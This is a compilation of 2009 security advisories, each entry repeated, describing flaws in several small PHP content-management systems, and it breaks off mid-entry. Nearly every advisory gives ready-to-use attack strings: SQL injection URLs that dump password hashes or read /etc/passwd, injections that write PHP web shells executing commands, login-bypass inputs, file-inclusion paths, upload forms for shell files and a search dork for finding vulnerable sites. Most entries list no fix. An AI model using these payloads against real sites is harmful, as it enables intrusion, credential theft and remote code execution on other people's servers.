LightOpenCMS 0.1 pre-alpha Remote SQL Injection
Salvatore drosophila Fresta [+] Application: LightOpenCMS [+] Version: 0.1 pre-alpha [+] Website: http://sourceforge.net/projects/lightopencms [+] Bugs: [A] Remote SQL Injection [+] Exploitation: Remote [+] Date: 05 Jun 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *** [+] Menu 1) Bugs 2) Code 3) Fix *** [+] Bugs - [A] Remote SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: dbc.php This bug allows a guest to inject arbitrary SQL statments. ... if (isset($_GET['id'])) { $result = mysql_query(SELECT * FROM pages WHERE id='.$_GET['id'].'); return mysql_fetch_assoc($result); ... *** [+] Code - [A] Remote SQL Injection http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23 *** [+] Fix No fix. *** -- Salvatore Fresta aka drosophila CWNP444351 Salvatore drosophila Fresta [+] Application: LightOpenCMS [+] Version: 0.1 pre-alpha [+] Website: http://sourceforge.net/projects/lightopencms [+] Bugs: [A] Remote SQL Injection [+] Exploitation: Remote [+] Date: 05 Jun 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *** [+] Menu 1) Bugs 2) Code 3) Fix *** [+] Bugs - [A] Remote SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: dbc.php This bug allows a guest to inject arbitrary SQL statments. ... if (isset($_GET['id'])) { $result = mysql_query(SELECT * FROM pages WHERE id='.$_GET['id'].'); return mysql_fetch_assoc($result); ... *** [+] Code - [A] Remote SQL Injection http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23 *** [+] Fix No fix. ***
Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Pragyan CMS [+] Version: 2.6.4 [+] Website: http://www.pragyan.org [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 22 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Risk: hight [-] Requisites: magic_quotes_gpc = off/on This web application is entirely vulnerable to SQL Injection because any variable is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/?action=viewfileget=-1' UNION ALL SELECT 'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23 * [+] Fix You must sanitise any user input. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Pragyan CMS [+] Version: 2.6.4 [+] Website: http://www.pragyan.org [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 22 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Risk: hight [-] Requisites: magic_quotes_gpc = off/on This web application is entirely vulnerable to SQL Injection because any variable is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/?action=viewfileget=-1' UNION ALL SELECT 'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23 * [+] Fix You must sanitise any user input. *
Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Multi-lingual E-Commerce System [+] Version: 0.2 [+] Website: http://sourceforge.net/projects/mlecsphp/ [+] Bugs: [A] Local File Inclusion [B] Information Disclosure [C] Arbitrary File Upload [+] Exploitation: Remote [+] Date: 19 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Local File Inclusion [-] Risk: hight [-] File affected: index.php This bug allows a guest to include local files. The following is the vulnerable code: ... if (isset($_GET['lang'])) { $_SESSION['lang'] = $_GET['lang'];} ... ? include($include_path.'/inc/'.$_GET['page'].'-'.$_SESSION['lang'].'.php'); ? ... - [B] Information Disclosure [-] Risk: medium [-] File affected: database.inc This file contains reserved informations such as the username and the password for connecting to the database. Using .inc extension only, the content is visible. - [C] Arbitrary File Upload [-] Risk: medium [-] File affected: product_image.php In the admin directory there are no files that check if the user has admin privileges. For this reason a guest can execute the files contained in this directory. product_image.php contains a form that allows to upload files on the system but does not contain functions that check the files extensions, however a user can upload arbitrary files. * [+] Code - [A] Local File Inclusion http://www.site.com/path/index.php?page=../../../../../etc/passwd *** Salvatore drosophila Fresta *** [+] Application: Multi-lingual E-Commerce System [+] Version: 0.2 [+] Website: http://sourceforge.net/projects/mlecsphp/ [+] Bugs: [A] Local File Inclusion [B] Information Disclosure [C] Arbitrary File Upload [+] Exploitation: Remote [+] Date: 19 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Local File Inclusion [-] Risk: hight [-] File affected: index.php This bug allows a guest to include local files. The following is the vulnerable code: ... if (isset($_GET['lang'])) { $_SESSION['lang'] = $_GET['lang'];} ... ? include($include_path.'/inc/'.$_GET['page'].'-'.$_SESSION['lang'].'.php'); ? ... - [B] Information Disclosure [-] Risk: medium [-] File affected: database.inc This file contains reserved informations such as the username and the password for connecting to the database. Using .inc extension only, the content is visible. - [C] Arbitrary File Upload [-] Risk: medium [-] File affected: product_image.php In the admin directory there are no files that check if the user has admin privileges. For this reason a guest can execute the files contained in this directory. product_image.php contains a form that allows to upload files on the system but does not contain functions that check the files extensions, however a user can upload arbitrary files. * [+] Code - [A] Local File Inclusion http://www.site.com/path/index.php?page=../../../../../etc/passwd %00 http://www.site.com/path/index.php?lang=/../../../../../../etc/passwd %00 - [B] Information Disclosure http://www.site.com/path/admin/inc/database.inc - [C] Arbitrary File Upload html head titleMulti-lingual E-Commerce System 0.2 Arbitrary File Upload Exploit/title /head body form enctype=multipart/form-data action=http://site/path/admin/product_image.php; method=POST label for=productValid product ID:/labelbr input type=text name=product value=1br label for=file_nameEvil file name:/labelbr input type=text name=file_name value=/shell.phpbr label for=userfileFile:/label input name=userfile type=file input type=hidden name=file_pathbrbr input type=submit value=Upload /form /body /html * [+] Fix No fix. *
Creasito e-commerce content manager Authentication Bypass
*** Salvatore drosophila Fresta *** [+] Application: creasito e-commerce content manager [+] Version: 1.3.16 [+] Website: http://creasito.bloghosteria.com [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 20 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs This cms is entirely vulnerable to SQL Injection. I decided to post authentication bypass security flaw only. - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: admin/checkuser.php, checkuser.php SQL Injection bug allows a guest to bypass the authentication system. The following is the vulnerable code: ... $username = $_POST['username']; ... $sql = mysql_query(SELECT * FROM amministratore WHERE username='$username' AND password='$password' AND activated='1'); ... * [+] Code - [A] Authentication Bypass Username: -1' OR '1'='1'# Password: foo * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: creasito e-commerce content manager [+] Version: 1.3.16 [+] Website: http://creasito.bloghosteria.com [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 20 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs This cms is entirely vulnerable to SQL Injection. I decided to post authentication bypass security flaw only. - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: admin/checkuser.php, checkuser.php SQL Injection bug allows a guest to bypass the authentication system. The following is the vulnerable code: ... $username = $_POST['username']; ... $sql = mysql_query(SELECT * FROM amministratore WHERE username='$username' AND password='$password' AND activated='1'); ... * [+] Code - [A] Authentication Bypass Username: -1' OR '1'='1'# Password: foo * [+] Fix No fix. *
Tiny Blogr 1.0.0 rc4 Authentication Bypass
*** Salvatore drosophila Fresta *** [+] Application: Tiny Blogr [+] Version: 1.0.0 rc4 [+] Website: http://tinyblogr.sourceforge.net [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 17 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: class.eport.php This bug allows a guest to bypass the authentication system. * [+] Code - [A] Authenticaion Bypass Username: admin'# Password: foo * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Tiny Blogr [+] Version: 1.0.0 rc4 [+] Website: http://tinyblogr.sourceforge.net [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 17 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: class.eport.php This bug allows a guest to bypass the authentication system. * [+] Code - [A] Authenticaion Bypass Username: admin'# Password: foo * [+] Fix No fix. *
Malleo 1.2.3 Local File Inclusion Vulnerability
*** Salvatore drosophila Fresta *** [+] Application: Malleo [+] Version: 1.2.3 [+] Website: http://www.malleo-cms.com [+] Bugs: [A] Local File Inclusion [+] Exploitation: Remote [+] Date: 17 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Local File Inclusion [-] Risk: low [-] File affected: admin.php This bug allows a privileged user to include local files. I decided to publish this bug for reporting security flaw only. The following is the vulnerable code: ... $module = (isset($_GET['module']))? $_GET['module']:$cf-config['default_module_admin']; ... }else{ // Mise a jour de la date d'activite de la session fondateur if ($cf-config['activer_digicode']) $_SESSION['digicode_TTL'] = time(); if (file_exists($root.$module)) { include_once($root.$module); ... * [+] Code - [A] Local File Inclusion http://www.site.com/path/admin.php?module=../../../../../etc/passwd * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Malleo [+] Version: 1.2.3 [+] Website: http://www.malleo-cms.com [+] Bugs: [A] Local File Inclusion [+] Exploitation: Remote [+] Date: 17 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Local File Inclusion [-] Risk: low [-] File affected: admin.php This bug allows a privileged user to include local files. I decided to publish this bug for reporting security flaw only. The following is the vulnerable code: ... $module = (isset($_GET['module']))? $_GET['module']:$cf-config['default_module_admin']; ... }else{ // Mise a jour de la date d'activite de la session fondateur if ($cf-config['activer_digicode']) $_SESSION['digicode_TTL'] = time(); if (file_exists($root.$module)) { include_once($root.$module); ... * [+] Code - [A] Local File Inclusion http://www.site.com/path/admin.php?module=../../../../../etc/passwd * [+] Fix No fix. *
PHP-agenda = 2.2.5 Remote File Overwriting
*** Salvatore drosophila Fresta *** [+] Application: PHP-agenda [+] Version: = 2.2.5 [+] Website: http://php-agenda.sourceforge.net [+] Bugs: [A] Remote File Overwriting [+] Exploitation: Remote [+] Date: 10 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Remote File Overwriting [-] Risk: hight [-] File affected: install.php This bug allows a guest to overwrite config.inc.php inserting PHP code. * [+] Code - [A] Remote File Overwriting html headPHP-agenda = 2.2.5 - Remote File Overwriting/head body form action=http://www.site.com/path/install.php; method=post input type=text name=dbhost size=30 value='; system($_GET['cmd']); echo ' input type=submit value=Exploit! /form /body /head To execute commands: http://www.site.com/path/config.inc.php?cmd=uname -a * [+] Fix You must delete install.php after installation. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: PHP-agenda [+] Version: = 2.2.5 [+] Website: http://php-agenda.sourceforge.net [+] Bugs: [A] Remote File Overwriting [+] Exploitation: Remote [+] Date: 10 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Remote File Overwriting [-] Risk: hight [-] File affected: install.php This bug allows a guest to overwrite config.inc.php inserting PHP code. * [+] Code - [A] Remote File Overwriting html headPHP-agenda = 2.2.5 - Remote File Overwriting/head body form action=http://www.site.com/path/install.php; method=post input type=text name=dbhost size=30 value='; system($_GET['cmd']); echo ' input type=submit value=Exploit! /form /body /head To execute commands: http://www.site.com/path/config.inc.php?cmd=uname -a * [+] Fix You must delete install.php after installation. *
Loggix Project 9.4.5 Blind SQL Injection
*** Salvatore drosophila Fresta *** [+] Application: Loggix Project [+] Version: 9.4.5 [+] Website: http://loggix.gotdns.org [+] Bugs: [A] Blind SQL Injection [+] Exploitation: Remote [+] Date: 10 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Blind SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: modules/comment/post.php This bug allows a guest to execute arbitrary queries. * [+] Code - [A] Blind SQL Injection POST /path/modules/comment/post.php HTTP/1.1\r\n Host: site\r\n Keep-Alive: 300\r\n Connection: keep-alive\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: 177\r\n \r\n title=titlecomment=commentuser_name=useruser_pass=passwordparent_key=keyrefer_id=-1' UNION ALL SELECT '?php system($_GET['cmd']); ?' INTO OUTFILE '/var/www/htdocs/rce.php * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Loggix Project [+] Version: 9.4.5 [+] Website: http://loggix.gotdns.org [+] Bugs: [A] Blind SQL Injection [+] Exploitation: Remote [+] Date: 10 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Blind SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: modules/comment/post.php This bug allows a guest to execute arbitrary queries. * [+] Code - [A] Blind SQL Injection POST /path/modules/comment/post.php HTTP/1.1\r\n Host: site\r\n Keep-Alive: 300\r\n Connection: keep-alive\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: 177\r\n \r\n title=titlecomment=commentuser_name=useruser_pass=passwordparent_key=keyrefer_id=-1' UNION ALL SELECT '?php system($_GET['cmd']); ?' INTO OUTFILE '/var/www/htdocs/rce.php * [+] Fix No fix. *
Dynamic Flash Forum 1.0 Beta Multiple Remote Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Dynamic Flash Forum [+] Version: 1.0 Beta [+] Website: http://df2.sourceforge.net/ [+] Bugs: [A] Information Disclosure [B] Authentication Bypass [C] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 09 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Information Disclosure [-] File affected: config.inc This file contains reserved informations such as the username and the password for connecting to the database. Using .inc extension only, the content is visible. - [B] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php This bug allows a guest to bypass the authentication system and to login with administrator privileges. - [C] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: viewprofile.php, viewmessage.php, viewthreads.php This bug allows a guest to execute arbitrary queries. * [+] Code - [A] Information Disclosure http://www.site.com/path/config.inc - [B] Authentication Bypass Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23 Password: password - [C] Multiple SQL Injection http://www.site.com/path/viewprofile.php?userID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23 http://www.site.com/path/viewmessage.php?threadID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL FROM users%23 http://www.site.com/path/viewthreads.php?boardID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)) FROM users%23 * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Dynamic Flash Forum [+] Version: 1.0 Beta [+] Website: http://df2.sourceforge.net/ [+] Bugs: [A] Information Disclosure [B] Authentication Bypass [C] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 09 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Information Disclosure [-] File affected: config.inc This file contains reserved informations such as the username and the password for connecting to the database. Using .inc extension only, the content is visible. - [B] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php This bug allows a guest to bypass the authentication system and to login with administrator privileges. - [C] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: viewprofile.php, viewmessage.php, viewthreads.php This bug allows a guest to execute arbitrary queries. * [+] Code - [A] Information Disclosure http://www.site.com/path/config.inc - [B] Authentication Bypass Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23 Password: password - [C] Multiple SQL Injection http://www.site.com/path/viewprofile.php?userID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23 http://www.site.com/path/viewmessage.php?threadID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL FROM users%23 http://www.site.com/path/viewthreads.php?boardID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)) FROM users%23 * [+] Fix No fix. *
AdaptBB 1.0 Beta Multiple Remote Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: AdaptBB [+] Version: 1.0 Beta [+] Website: http://sourceforge.net/projects/adaptbb/ [+] Bugs: [A] Multiple Blind SQL Injection [B] Multiple Dynamic Code Execution [C] Arbitrary File Upload [+] Exploitation: Remote [+] Date: 09 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple Blind SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: almost all of the files are vulnerable This bug allows a guest to execute arbitrary SQL queries. - [B] Multiple Dynamic Code Execution [-] Risk: hight [-] File affected: almost all of the files are vulnerable This bug allows a guest to execute arbitrary php code. ... if ($_GET['box']) { $folder = $_GET['box']; } ... $ddata[] = ucwords($folder); ... eval ( ? .str_replace($cdata, $ddata, stripslashes(template($view._header))). ?php ); ... - [C] Arbitrary File Upload [-] Risk: hight [-] File affected: attach.php This bug allows a registered user to upload arbitrary files and to execute them from inc/attachments directory. This is possible because there are no controls on file extension on the server side but only on the client side. * [+] Code - [A] Multiple Blind SQL Injection http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 http://site/path/index.php?do=profileuser=blablabox=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 http://site/path/index.php?do=messagesuser=blablabox=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 http://site/path/index.php?do=edit_postid=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8,9 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 To execute commands: http://site/path/rce.php?cmd=uname -a - [B] Multiple Dynamic Code Execution http://www.site.com/path/index.php?do=profileuser=blablabox=?php echo pre; system('ls'); echo /pre? http://www.site.com/path/index.php?do=messagesuser=blablabox=?php echo pre; system('ls'); echo /pre? * [+] Fix To fix them you must check the input properly. However is not recommended to store your real username and password in the cookies. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: AdaptBB [+] Version: 1.0 Beta [+] Website: http://sourceforge.net/projects/adaptbb/ [+] Bugs: [A] Multiple Blind SQL Injection [B] Multiple Dynamic Code Execution [C] Arbitrary File Upload [+] Exploitation: Remote [+] Date: 09 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple Blind SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: almost all of the files are vulnerable This bug allows a guest to execute arbitrary SQL queries. - [B] Multiple Dynamic Code Execution [-] Risk: hight [-] File affected: almost all of the files are vulnerable This bug allows a guest to execute arbitrary php code. ... if ($_GET['box']) { $folder = $_GET['box']; } ... $ddata[] = ucwords($folder); ... eval ( ? .str_replace($cdata, $ddata, stripslashes(template($view._header))). ?php ); ... - [C] Arbitrary File Upload [-] Risk: hight [-] File affected: attach.php This bug allows a registered user to upload arbitrary files and to execute them from inc/attachments directory. This is possible because there are no controls on file extension on the server side but only on the client side. * [+] Code - [A] Multiple Blind SQL Injection http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 http://site/path/index.php?do=profileuser=blablabox=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 http://site/path/index.php?do=messagesuser=blablabox=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 http://site/path/index.php?do=edit_postid=-1' UNION ALL SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8,9
Joomla Component com_bookjoomlas SQL Injection Vulnerability
*** Salvatore drosophila Fresta *** [+] Application: Joomla Component com_bookjoomlas [+] Version: 0.1 [+] Website: http://www.alikonweb.it [+] Bugs: [A] SQL Injection [+] Exploitation: Remote [+] Dork: inurl:index.php?option=com_bookjoomlas [+] Date: 06 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] Security risk: low [-] File affected: sub_commententry.php This bug allows a privileged user to view username and password of a registered user. Like all SELECT vulnerable queries, this can be manipulate to write files on system. * [+] Code - [A] SQL Injection http://www.site.com/path/index.php?option=com_bookjoomlasItemid=26func=commentgbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Joomla Component com_bookjoomlas [+] Version: 0.1 [+] Website: http://www.alikonweb.it [+] Bugs: [A] SQL Injection [+] Exploitation: Remote [+] Dork: inurl:index.php?option=com_bookjoomlas [+] Date: 06 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] Security risk: low [-] File affected: sub_commententry.php This bug allows a privileged user to view username and password of a registered user. Like all SELECT vulnerable queries, this can be manipulate to write files on system. * [+] Code - [A] SQL Injection http://www.site.com/path/index.php?option=com_bookjoomlasItemid=26func=commentgbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users * [+] Fix No fix. *
Family Connections 1.8.2 Arbitrary File Upload
*** Salvatore drosophila Fresta *** [+] Application: Family Connection [+] Version: = 1.8.2 [+] Website: http://www.familycms.com [+] Bugs: [A] Arbitrary File Upload [+] Exploitation: Remote [+] Date: 3 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Arbitrary File Upload [-] Files affected: documents.php inc/documents_class.php This bug allows a registered user to upload arbitrary files on the system. This is possible because there aren't controls on file extension but on the Content-Type header only, that can be changed easily. ... if (isset($_POST['submitadd'])) { $doc = $_FILES['doc']['name']; $desc = addslashes($_POST['desc']); if ($docs-uploadDocument($_FILES['doc']['type'], $_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) { ... function uploadDocument ($filetype, $filename, $filetmpname) { global $LANG; $known_photo_types = array('application/msword' = 'doc', 'text/plain' = 'txt', 'application/excel' = 'xsl', 'application/vnd.ms-excel' = 'xsl', 'application/x-msexcel' = 'xsl', 'application/x-compressed' = 'zip', 'application/x-zip-compressed' = 'zip', 'application/zip' = 'zip', 'multipart/x-zip' = 'zip', 'application/rtf' = 'rtf', 'application/x-rtf' = 'rtf', 'text/richtext' = 'rtf', 'application/mspowerpoint' = 'ppt', 'application/powerpoint' = 'ppt', 'application/vnd.ms-powerpoint' = 'ppt', 'application/x-mspowerpoint' = 'ppt', 'application/x-excel' = 'xsl', 'application/pdf' = 'pdf'); if (!array_key_exists($filetype, $known_photo_types)) { echo p class=\error-alert\.$LANG['err_not_doc1']. $filetype .$LANG['err_not_doc2'].br/.$LANG['err_not_doc3']./p; return false; } else { copy($filetmpname, gallery/documents/$filename); return true; } } ... * [+] Code - [A] Arbitrary File Upload The following is an example of a malicious package: POST /fcms/upload.php HTTP/1.1\r\n Host: localhost\r\n Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n Content-type: multipart/form-data, boundary=AaB03x\r\n Content-Length: 295\r\n\r\n --AaB03x\r\n Content-Disposition: form-data; name=doc; filename=file.php\r\n Content-Type: text/plain\r\n \r\n ?php echo This is not a text file?\r\n --AaB03x\r\n Content-Disposition: form-data; name=desc\r\n \r\n description\r\n --AaB03x\r\n Content-Disposition: form-data; name=submitadd\r\n \r\n Submit\r\n --AaB03x--\r\n * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Family Connection [+] Version: = 1.8.2 [+] Website: http://www.familycms.com [+] Bugs: [A] Arbitrary File Upload [+] Exploitation: Remote [+] Date: 3 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Arbitrary File Upload [-] Files affected: documents.php inc/documents_class.php This bug allows a registered user to upload arbitrary files on the system. This is possible because there aren't controls on file extension but on the Content-Type header only, that can be changed easily. ... if (isset($_POST['submitadd'])) { $doc = $_FILES['doc']['name']; $desc = addslashes($_POST['desc']); if ($docs-uploadDocument($_FILES['doc']['type'], $_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) { ... function uploadDocument ($filetype, $filename, $filetmpname) { global $LANG; $known_photo_types = array('application/msword' = 'doc', 'text/plain' = 'txt', 'application/excel' = 'xsl', 'application/vnd.ms-excel' = 'xsl', 'application/x-msexcel' = 'xsl', 'application/x-compressed' = 'zip', 'application/x-zip-compressed' = 'zip', 'application/zip' = 'zip', 'multipart/x-zip' = 'zip', 'application/rtf' = 'rtf', 'application/x-rtf' = 'rtf', 'text/richtext' = 'rtf', 'application/mspowerpoint' = 'ppt', 'application/powerpoint' = 'ppt', 'application/vnd.ms
Family Connections = 1.8.2 - Remote Shell Upload Exploit
